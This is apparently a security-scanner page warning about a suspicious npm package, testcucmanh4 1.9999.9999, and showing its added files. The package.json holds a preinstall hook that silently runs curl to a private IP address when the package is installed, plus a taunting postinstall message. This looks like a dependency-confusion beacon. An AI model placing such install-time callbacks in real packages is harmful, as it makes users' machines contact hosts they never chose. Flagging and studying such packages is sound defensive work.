testcucmanh4 1.9999.9999

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of testcucmanh4 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +16 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ 'use strict'
2
+
3
+ console.log('bang! bang!')
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "testcucmanh4",
3
+ "version": "1.9999.9999",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "echo '\n\n ===> Your Feeble Skills Are No Match For The Power Of The Dark Side <=== \n\n'",
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall": "curl http://192.168.110.137"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC"
14
+ }
15
+
16
+